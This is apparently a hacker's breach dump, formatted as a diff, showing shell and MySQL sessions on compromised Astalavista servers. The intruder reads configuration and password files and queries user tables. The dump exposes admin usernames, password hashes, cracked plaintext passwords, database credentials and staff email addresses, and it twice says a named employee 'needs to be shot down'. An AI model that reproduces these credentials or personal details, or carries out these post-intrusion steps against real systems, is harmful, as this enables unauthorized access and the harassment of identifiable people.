+ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
+arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif    
+verre-eau.gif
+argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif   
+verre-vin.gif
+ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
+biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
+
+./pjirc/snd:
+bell2.au  ding.au
+
+./search:
+searchEngines.php  search.php
+
+./_tmp:
+defaultPorts.php  defaultPorts.txt
+
+sh-3.2$ cd cronjobs/
+sh-3.2$ cat exploits.php
+[snip]
+$categories   = array();
+$milw0rmFile  = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
+$expolits     = file($milw0rmFile);
+$comExploits  = array();
+[snip]
+// manage data
+for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+
+    // get path and title
+    $expolits[$x] = trim($expolits[$x]);
+    $path         = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
+    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
+
+    // check if file exists
+    if (file_exists($path)) {
+
+        $text = file_get_contents($path);
+
+        // get content and date
+        //$text = htmlspecialchars($text, ENT_QUOTES);
+        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, "UTF-8"));
+        if ($tmptext != '') {
+            $text = $tmptext;
+        } else {
+            $text = addslashes(htmlentities($text,  ENT_QUOTES));
+        }
+        $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
+        $tmp  = explode('-', $date);
+        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
+        $cat  = getCategory ($path);
+        $ext  = pathinfo(basename($path));
+        $ext  = $ext['extension'];
+        $qStr = "
+            SELECT  `id`
+            FROM    `contrexx_module_exploits`
+            WHERE   `title`  =  '" . $title . "'
+            AND     `date`   =  '" . $date . "'
+        ";
+        echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
+        $q = $_objDB->query($qStr);
+
+        if ($q->numRows() == 0) {
+
+            // prepare array
+            $comExploits[$x]['date']      = $date;
+            $comExploits[$x]['title']     = $title;
+            $comExploits[$x]['author']    = 'milw0rm';
+            $comExploits[$x]['text']      = $text;
+            $comExploits[$x]['source']    = $ext;
+            $comExploits[$x]['url1']      = '';
+            $comExploits[$x]['url2']      = '';
+            $comExploits[$x]['catid']     = $cat;
+            $comExploits[$x]['lang']      = '2';
+            $comExploits[$x]['userid']    = '12';
+            $comExploits[$x]['startdate'] = '0000-00-00';
+            $comExploits[$x]['enddate']   = '0000-00-00';
+            $comExploits[$x]['status']    = '1';
+            $comExploits[$x]['changelog'] = $date;
+
+        }
+[snip]
+    $xml = '
+
+    
+        ASTALAVISTA.com - Exploits
+        http://www.astalavista.com/exploits
+        All availably Exploits.
+        en-us
+        ' . date('F, j M Y H:i:s O') . '
+        http://blogs.law.harvard.edu/tech/rss
+        Astalavista.com
+        info@astalavista.com' . $items . '
+    
+';
+
+
+    if (file_exists(FULLPATH . '/feed/exploits.xml')) {
+        unlink (FULLPATH . '/feed/exploits.xml');
+    }
+
+
+    file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
+[snip]
+
+sh-3.2$ cat exploits.sh
+#!/bin/sh
+
+###########################################################
+#                                                         #
+#   Title:        milw0rm exploits adder                  #
+#   Description:  Add all milw0rm exploits to the         #
+#                 Astalavista.com database                #
+#                                                         #
+#   Company:      Astalavista Group                       #
+#   Author:       Paulo M. Santos                         #
+#   E-Mail:       paulo.santos@astalavista.ch             #
+#                                                         #
+###########################################################
+
+
+# path
+this_path=/home/com/public_html/modifications/cronjobs
+
+# change directory
+cd $this_path
+cd tmp/
+
+# delete files
+rm -rf milw0rm.tar.* &
+rm -rf milw0rm/ &
+
+# wget milw0rm paket
+wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
+
+# extract milw0rm paket
+tar -xvf milw0rm.tar.bz2
+
+# change owner
+chown -R com .
+chgrp -R com .
+
+# execute php script
+cd $this_path
+php -q exploits.php
+
+# delete files
+rm -rf tmp/milw0rm.tar.*
+rm -rf tmp/milw0rm/
+
+sh-3.2$ echo "Paulo M. Santos needs to be shot down."
+Paulo M. Santos needs to be shot down.
+
+mysql -u contrexxuser2 -p
+Enter password:
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 261694
+Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
+
+mysql> show databases;
++--------------------+
+| Database           |
++--------------------+
+| information_schema |
+| com_contrexx2      |
+| com_contrexx2_live |
+| test               |
++--------------------+
+4 rows in set (0.00 sec)
+
+mysql> use com_contrexx2_live
+Database changed
+mysql> show tables;
++--------------------------------------------------+
+| Tables_in_com_contrexx2_live                     |
++--------------------------------------------------+
+| cc_banner_counter                                |
+| cc_search_counter                                |
+| contrexx_access_group_dynamic_ids                |
+| contrexx_access_group_static_ids                 |
+| contrexx_access_rel_user_group                   |
+| contrexx_access_settings                         |
+| contrexx_access_user_attribute                   |
+| contrexx_access_user_attribute_name              |
+| contrexx_access_user_attribute_value             |
+| contrexx_access_user_core_attribute              |
+| contrexx_access_user_groups                      |
+| contrexx_access_user_mail                        |
+| contrexx_access_user_profile                     |
+| contrexx_access_user_title                       |
+| contrexx_access_user_validity                    |
+| contrexx_access_users                            |
+| contrexx_backend_areas                           |
+| contrexx_backups                                 |
+| contrexx_content                                 |
+| contrexx_content_history                         |
+| contrexx_content_logfile                         |
+| contrexx_content_navigation                      |
+| contrexx_content_navigation_history              |
+| contrexx_ids                                     |
+| contrexx_languages                               |
+| contrexx_lib_country                             |
+| contrexx_log                                     |
+| contrexx_module_alias_source                     |
+| contrexx_module_alias_target                     |
+| contrexx_module_block_blocks                     |
+| contrexx_module_block_rel_lang                   |
+| contrexx_module_block_rel_pages                  |
+| contrexx_module_block_settings                   |
+| contrexx_module_blog_categories                  |
+| contrexx_module_blog_comments                    |
+| contrexx_module_blog_message_to_category         |
+| contrexx_module_blog_messages                    |
+| contrexx_module_blog_messages_lang               |
+| contrexx_module_blog_networks                    |
+| contrexx_module_blog_networks_lang               |
+| contrexx_module_blog_settings                    |
+| contrexx_module_blog_votes                       |
+| contrexx_module_calendar                         |
+| contrexx_module_calendar_access                  |
+| contrexx_module_calendar_categories              |
+| contrexx_module_calendar_form_data               |
+| contrexx_module_calendar_form_fields             |
+| contrexx_module_calendar_registrations           |
+| contrexx_module_calendar_settings                |
+| contrexx_module_calendar_style                   |
+| contrexx_module_contact_form                     |
+| contrexx_module_contact_form_data                |
+| contrexx_module_contact_form_field               |
+| contrexx_module_contact_settings                 |
+| contrexx_module_data_categories                  |
+| contrexx_module_data_message_to_category         |
+| contrexx_module_data_messages                    |
+| contrexx_module_data_messages_lang               |
+| contrexx_module_data_placeholders                |
+| contrexx_module_data_settings                    |
+| contrexx_module_directory_access                 |
+| contrexx_module_directory_categories             |
+| contrexx_module_directory_dir                    |
+| contrexx_module_directory_inputfields            |
+| contrexx_module_directory_levels                 |
+| contrexx_module_directory_mail                   |
+| contrexx_module_directory_rel_dir_cat            |
+| contrexx_module_directory_rel_dir_level          |
+| contrexx_module_directory_settings               |
+| contrexx_module_directory_settings_google        |
+| contrexx_module_directory_vote                   |
+| contrexx_module_docsys                           |
+| contrexx_module_docsys_categories                |
+| contrexx_module_egov_configuration               |
+| contrexx_module_egov_orders                      |
+| contrexx_module_egov_product_calendar            |
+| contrexx_module_egov_product_fields              |
+| contrexx_module_egov_products                    |
+| contrexx_module_egov_settings                    |
+| contrexx_module_exploits                         |
+| contrexx_module_exploits_categories              |
+| contrexx_module_feed_category                    |
+| contrexx_module_feed_news                        |
+| contrexx_module_feed_newsml_association          |
+| contrexx_module_feed_newsml_categories           |
+| contrexx_module_feed_newsml_documents            |
+| contrexx_module_feed_newsml_providers            |
+| contrexx_module_forum_access                     |
+| contrexx_module_forum_categories                 |
+| contrexx_module_forum_categories_lang            |
+| contrexx_module_forum_notification               |
+| contrexx_module_forum_postings                   |
+| contrexx_module_forum_rating                     |
+| contrexx_module_forum_settings                   |
+| contrexx_module_forum_statistics                 |
+| contrexx_module_gallery_categories               |
+| contrexx_module_gallery_comments                 |
+| contrexx_module_gallery_language                 |
+| contrexx_module_gallery_language_pics            |
+| contrexx_module_gallery_pictures                 |
+| contrexx_module_gallery_settings                 |
+| contrexx_module_gallery_votes                    |
+| contrexx_module_guestbook                        |
+| contrexx_module_guestbook_settings               |
+| contrexx_module_livecam                          |
+| contrexx_module_livecam_settings                 |
+| contrexx_module_market                           |
+| contrexx_module_market_access                    |
+| contrexx_module_market_categories                |
+| contrexx_module_market_mail                      |
+| contrexx_module_market_paypal                    |
+| contrexx_module_market_settings                  |
+| contrexx_module_market_spez_fields               |
+| contrexx_module_mediadir_access                  |
+| contrexx_module_mediadir_categories              |
+| contrexx_module_mediadir_comments                |
+| contrexx_module_mediadir_dir                     |
+| contrexx_module_mediadir_inputfields             |
+| contrexx_module_mediadir_levels                  |
+| contrexx_module_mediadir_mail                    |
+| contrexx_module_mediadir_rel_dir_cat             |
+| contrexx_module_mediadir_rel_dir_level           |
+| contrexx_module_mediadir_reports                 |
+| contrexx_module_mediadir_settings                |
+| contrexx_module_mediadir_settings_google         |
+| contrexx_module_mediadir_vote                    |
+| contrexx_module_memberdir_directories            |
+| contrexx_module_memberdir_name                   |
+| contrexx_module_memberdir_settings               |
+| contrexx_module_memberdir_values                 |
+| contrexx_module_nettools_allowed_groups          |
+| contrexx_module_nettools_settings                |
+| contrexx_module_news                             |
+| contrexx_module_news_access                      |
+| contrexx_module_news_categories                  |
+| contrexx_module_news_settings                    |
+| contrexx_module_news_teaser_frame                |
+| contrexx_module_news_teaser_frame_templates      |
+| contrexx_module_news_ticker                      |
+| contrexx_module_newsletter                       |
+| contrexx_module_newsletter_attachment            |
+| contrexx_module_newsletter_category              |
+| contrexx_module_newsletter_confirm_mail          |
+| contrexx_module_newsletter_rel_cat_news          |
+| contrexx_module_newsletter_rel_user_cat          |
+| contrexx_module_newsletter_settings              |
+| contrexx_module_newsletter_template              |
+| contrexx_module_newsletter_tmp_sending           |
+| contrexx_module_newsletter_user                  |
+| contrexx_module_newsletter_user_title            |
+| contrexx_module_onlinetools_defaultports         |
+| contrexx_module_onlinetools_defaultports_back    |
+| contrexx_module_onlinetools_geolitecity_blocks   |
+| contrexx_module_onlinetools_geolitecity_country  |
+| contrexx_module_onlinetools_geolitecity_location |
+| contrexx_module_podcast_category                 |
+| contrexx_module_podcast_medium                   |
+| contrexx_module_podcast_rel_category_lang        |
+| contrexx_module_podcast_rel_medium_category      |
+| contrexx_module_podcast_settings                 |
+| contrexx_module_podcast_template                 |
+| contrexx_module_proxydb                          |
+| contrexx_module_recommend                        |
+| contrexx_module_repository                       |
+| contrexx_module_securitynews_cats                |
+| contrexx_module_securitynews_feeds               |
+| contrexx_module_securitynews_news                |
+| contrexx_module_shop_categories                  |
+| contrexx_module_shop_config                      |
+| contrexx_module_shop_countries                   |
+| contrexx_module_shop_currencies                  |
+| contrexx_module_shop_customers                   |
+| contrexx_module_shop_importimg                   |
+| contrexx_module_shop_lsv                         |
+| contrexx_module_shop_mail                        |
+| contrexx_module_shop_mail_content                |
+| contrexx_module_shop_manufacturer                |
+| contrexx_module_shop_order_items                 |
+| contrexx_module_shop_order_items_attributes      |
+| contrexx_module_shop_orders                      |
+| contrexx_module_shop_payment                     |
+| contrexx_module_shop_payment_processors          |
+| contrexx_module_shop_pricelists                  |
+| contrexx_module_shop_products                    |
+| contrexx_module_shop_products_attributes         |
+| contrexx_module_shop_products_attributes_name    |
+| contrexx_module_shop_products_attributes_value   |
+| contrexx_module_shop_products_downloads          |
+| contrexx_module_shop_rel_countries               |
+| contrexx_module_shop_rel_payment                 |
+| contrexx_module_shop_rel_shipment                |
+| contrexx_module_shop_shipment_cost               |
+| contrexx_module_shop_shipper                     |
+| contrexx_module_shop_vat                         |
+| contrexx_module_shop_zones                       |
+| contrexx_module_u2u_address_list                 |
+| contrexx_module_u2u_message_log                  |
+| contrexx_module_u2u_sent_messages                |
+| contrexx_module_u2u_settings                     |
+| contrexx_module_u2u_user_log                     |
+| contrexx_modules                                 |
+| contrexx_sessions                                |
+| contrexx_settings                                |
+| contrexx_settings_smtp                           |
+| contrexx_skins                                   |
+| contrexx_stats_browser                           |
+| contrexx_stats_colourdepth                       |
+| contrexx_stats_config                            |
+| contrexx_stats_country                           |
+| contrexx_stats_hostname                          |
+| contrexx_stats_javascript                        |
+| contrexx_stats_operatingsystem                   |
+| contrexx_stats_referer                           |
+| contrexx_stats_requests                          |
+| contrexx_stats_requests_summary                  |
+| contrexx_stats_screenresolution                  |
+| contrexx_stats_search                            |
+| contrexx_stats_spiders                           |
+| contrexx_stats_spiders_summary                   |
+| contrexx_stats_visitors                          |
+| contrexx_stats_visitors_summary                  |
+| contrexx_voting_additionaldata                   |
+| contrexx_voting_email                            |
+| contrexx_voting_rel_email_system                 |
+| contrexx_voting_results                          |
+| contrexx_voting_system                           |
+| foo                                              |
++--------------------------------------------------+
+227 rows in set (0.01 sec)
+
+mysql> select count(*) as skids from contrexx_access_users;
++-------+
+| skids |
++-------+
+| 53699 |
++-------+
+1 row in set (0.00 sec)
+
+mysql> describe contrexx_access_users;
++------------------+------------------------------------------+------+-----+--------------+----------------+
+| Field            | Type                                     | Null | Key | Default      | Extra          |
++------------------+------------------------------------------+------+-----+--------------+----------------+
+| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |
+| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |
+| username         | varchar(40)                              | YES  | MUL | NULL         |                |
+| password         | varchar(32)                              | YES  |     | NULL         |                |
+| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
+| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
+| validity         | int(10) unsigned                         | NO   |     | 0            |                |
+| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
+| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
+| email            | varchar(255)                             | YES  |     | NULL         |                |
+| email_access     | enum('everyone','members_only','nobody') | NO   |     | nobody       |                |
+| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
+| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
+| active           | tinyint(1)                               | NO   |     | 0            |                |
+| profile_access   | enum('everyone','members_only','nobody') | NO   |     | members_only |                |
+| restore_key      | varchar(32)                              | NO   |     |              |                |
+| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |
+| u2u_active       | enum('0','1')                            | NO   |     | 1            |                |
++------------------+------------------------------------------+------+-----+--------------+----------------+
+18 rows in set (0.00 sec)
+
+mysql> select username,password,email from contrexx_access_users where is_admin = 1;
++------------+----------------------------------+-----------------------------+
+| username   | password                         | email                       |
++------------+----------------------------------+-----------------------------+
+| system     | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com          |
+| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com      |
+| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
+| schmid     | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com   |
++------------+----------------------------------+-----------------------------+
+4 rows in set (0.04 sec)
+
+mysql> exit;
+Bye
+
+[~] There you go, your "team of security and IT professionals" is a joke.
+
++------------------------------+
+system:f82BN3+_*
+Be1er0ph0r:belerophor4astacom
+prozac:asta4cms!
+commander:mpbdaagf6m
+sykadul:ak29eral
++------------------------------+
+
+[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
+	...and the others, find another area to get paid from, security isn't for sale and you obviously fail at it.
+
+[~] Lets move to astalavista.net now,
+
+From :
+>> Everyone knows that the best defense is a good offense. 
+>> Those who wait for their foes to find a security loophole are opting for the wrong strategy. 
+>> The ASTALAVISTA hacking & security community is the largest IT security community in the world. 
+>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking."
+
+>> Go ahead, try and hack our server . in a completely legal way!
+>> Learn by doing: We offer our members tricky tasks and challenges on an
+>> ongoing basis so you can test your knowledge and abilities. You can also
+>> demonstrate what you.ve mastered by taking part in regular hacker contests
+>> and war games
+
+[~] Lets take a look there, after all... they are hack-proof, aren't they?!
+
+[-] Tricky task: Find home dir of astalavista.net
+
+sh-3.2$ ls -la ~astanet
+total 48
+drwx--x--x  6 astanet astanet 4096 Dec 23 15:55 .
+drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
+drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
+-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history
+-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout
+-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile
+-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc
+drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains
+drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap
+drwx------  2 astanet astanet 4096 Dec 23 12:18 mail
+lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
+-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow
+
+sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
+sh-3.2$ ls -la
+total 200
+drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 .
+drwx--x--x  8 astanet astanet  4096 Dec 23 13:53 ..
+drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
+drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
+drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 astanet@astalavista.com
+drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
+drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
+-rw-r--r--  1 astanet astanet 25724 Apr  4  2006 banner.jpg
+drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
+drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
+drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
+-rw-r--r--  1 astanet astanet    36 Jan  5  2006 error.php
+-rw-r--r--  1 astanet astanet  1406 Jan  5  2006 favicon.ico
+drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
+drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
+-rw-r--r--  1 astanet astanet    18 Jan  5  2006 htaccess
+-rw-r--r--  1 astanet astanet   585 Mar 24 14:50 .htaccess
+-rw-r--r--  1 astanet astanet   398 Jan  5  2006 index1.php
+-rw-r--r--  1 astanet astanet  1036 Jan  5  2006 _index.html
+-rw-r--r--  1 astanet astanet  6880 Dec 23 14:44 index.php
+-rw-r--r--  1 astanet astanet   676 Mar 21  2006 index_redirect.php
+-rw-r--r--  1 astanet astanet   739 Feb 24  2006 index.swf
+drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
+drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
+drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
+drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
+drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
+drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
+drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
+-rw-r--r--  1 astanet astanet  7219 Feb 24  2006 pix1.swf
+drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
+-rw-r--r--  1 astanet astanet    23 Jan  5  2006 robots.txt
+drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
+drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
+drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com
+drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
+drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
+drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
+drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
+drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old
+-rw-r--r--  1 astanet astanet    35 Dec  4  2006 webcash.php
+drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
+
+sh-3.2$ head -20 index.php
+
+* @version       1.0
+*/
+
+        if ($_SERVER['PHP_SELF'] == '/webcash.php') {
+                $dontStartSession = false;
+        } else {
+                $dontStartSession = true;
+        }
+        require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
+        require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
+        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
+        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');
+
+sh-3.2$ cd config
+sh-3.2$ ls -la
+total 32
+drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
+drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
+-rw-r--r--  1 astanet astanet  987 Aug 11  2006 adm.conf.php
+-rw-r--r--  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
+-rw-r--r--  1 astanet astanet  913 Aug 11  2006 cron.conf.php
+-rw-r--r--  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
+-rw-r--r--  1 astanet astanet 2724 May 30  2007 int.conf.php
+
+sh-3.2$ cat com.conf.php
+[snip]
+//member-database
+$_CONFIG['db_mem_server']       = 'localhost';
+$_CONFIG['db_mem_database'] = 'astanet_membersystem';
+$_CONFIG['db_mem_user']         = 'astanet_db';
+$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
+$_CONFIG['db_mem_debug']        = false; //true or false
+//ads-database
+$_CONFIG['db_ads_server']       = 'localhost';
+$_CONFIG['db_ads_database'] = 'astanet_ads';
+$_CONFIG['db_ads_user']         = 'astanet_db';
+$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
+$_CONFIG['db_ads_debug']        = false; //true or false
+//rainbow-database
+$_CONFIG['db_rainbow_server']   = '212.254.194.163';
+$_CONFIG['db_rainbow_database'] = 'rainbow';
+$_CONFIG['db_rainbow_user']     = 'dinu';
+$_CONFIG['db_rainbow_password'] = 'dinudinu';
+$_CONFIG['db_rainbow_debug']    = false; //true or false
+//mailing lists database
+$_CONFIG['db_mailing_lists_server']     = 'localhost';
+$_CONFIG['db_mailing_lists_database']   = 'astanet_mailing_lists';
+$_CONFIG['db_mailing_lists_user']               = 'astanet_db';
+$_CONFIG['db_mailing_lists_password']   = 'TXwVrC7hbq';
+$_CONFIG['db_mailing_lists_debug']              = false; //true or false
+//paypal
+$_CONFIG['sub_pp_url']          = 'https://www.paypal.com/cgi-bin/webscr';
+$_CONFIG['sub_pp_cmd']          = '_xclick';
+$_CONFIG['sub_pp_business'] = 'info@astalavista.net';
+$_CONFIG['sub_pp_noship']       = '1';
+$_CONFIG['sub_pp_referer']      = 'https://www.paypal.com/';
+[snip]
+
+sh-3.2$ cd ..
+sh-3.2$ cd member
+sh-3.2$ ls -la
+total 20
+drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
+drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
+-rw-r--r--  1 astanet astanet   19 Jan 13 14:02 .htaccess
+-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
+sh-3.2$ cat .htaccess
+SecFilterEngine off
+
+sh-3.2$ cd ..
+sh-3.2$ cd cron
+sh-3.2$ ls -la
+total 168
+drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
+drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 ..
+-rw-r--r--  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
+-rw-r--r--  1 astanet astanet  2356 Aug 11  2006 0_functions.php
+-rw-r--r--  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
+-rw-r--r--  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
+-rw-r--r--  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
+-rw-r--r--  1 astanet astanet   432 Aug 11  2006 1_weekly.php
+-rw-r--r--  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
+-rw-r--r--  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
+-rw-r--r--  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
+-rw-r--r--  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
+-rw-r--r--  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
+-rw-r--r--  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
+-rw-r--r--  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
+-rw-r--r--  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
+-rw-r--r--  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
+-rw-r--r--  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
+-rw-r--r--  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php
+-rw-r--r--  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
+drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
+-rw-r--r--  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
+-rw-r--r--  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
+
+sh-3.2$ cd ..
+sh-3.2$ cd _007
+sh-3.2$ ls -la
+total 24
+drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
+drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
+-rw-r--r--  1 astanet astanet   96 Dec 23 15:17 .htaccess
+-rw-r--r--  1 astanet astanet 3263 Jan 15  2007 index.php
+-rw-r--r--  1 astanet astanet   20 Dec 27  2006 info.php
+drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
+
+sh-3.2$ cat  .htaccess
+authType Basic
+authName Admin
+authUserFile /home/astanet/auth/.htadm_pwd
+require valid-user
+
+sh-3.2$ cat /home/astanet/auth/.htadm_pwd
+admin2net:CR0bl65MwhfT
+
+sh-3.2$ mysql -u astanet_db -p
+Enter password:
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 275153
+Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
+
+mysql> show databases;
++-----------------------+
+| Database              |
++-----------------------+
+| information_schema    |
+| astanet_ads           |
+| astanet_mailing_lists |
+| astanet_mediawiki     |
+| astanet_membersystem  |
+| test                  |
++-----------------------+
+6 rows in set (0.00 sec)
+
+mysql> use astanet_membersystem
+Database changed
+mysql> show tables;
++-----------------------------------+
+| Tables_in_astanet_membersystem    |
++-----------------------------------+
+| blacklist_categories              |
+| blacklist_content                 |
+| blacklist_levels                  |
+| blacklist_mcset                   |
+| dir_categories                    |
+| dir_comments                      |
+| dir_links                         |
+| dir_temp                          |
+| dir_votes                         |
+| documents                         |
+| documents_categories              |
+| email_content                     |
+| email_settings                    |
+| exploits                          |
+| exploits_categories               |
+| exploittree_categories            |
+| exploittree_exploits              |
+| home_values                       |
+| iso_countries                     |
+| links_categories                  |
+| links_records                     |
+| links_unauth                      |
+| links_votes                       |
+| log                               |
+| news_categories                   |
+| news_comments                     |
+| news_emoticons                    |
+| news_latest                       |
+| news_messages                     |
+| news_statistics                   |
+| news_votes                        |
+| prices_content                    |
+| prices_offers                     |
+| rss_settings                      |
+| sessions                          |
+| stats_signups                     |
+| u2u2                              |
+| u2u_contact                       |
+| u2u_settings                      |
+| user_keywords_selected_categories |
+| users                             |
+| users_ipn_test                    |
+| users_keyword_values              |
+| users_profile                     |
+| users_temp                        |
+| users_upgrade                     |
++-----------------------------------+
+46 rows in set (0.00 sec)
+
+mysql> describe users;
++--------------------------+--------------------------------------+------+-----+---------------------+----------------+
+| Field                    | Type                                 | Null | Key | Default             | Extra          |
++--------------------------+--------------------------------------+------+-----+---------------------+----------------+
+| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
+| user                     | varchar(50)                          | NO   |     |                     |                |
+| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
+| password                 | varchar(30)                          | NO   |     |                     |                |
+| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
+| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
+| email                    | varchar(50)                          | NO   |     |                     |                |
+| ip                       | varchar(15)                          | NO   |     | 0                   |                |
+| proxy                    | set('0','1')                         | NO   |     | 0                   |                |
+| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
+| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
+| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
+| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
+| checked                  | set('0','1','2')                     | NO   |     | 0                   |                |
